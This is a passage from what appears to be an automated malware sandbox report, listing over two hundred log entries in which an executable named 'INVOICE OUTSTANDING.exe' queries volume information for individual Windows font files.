            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
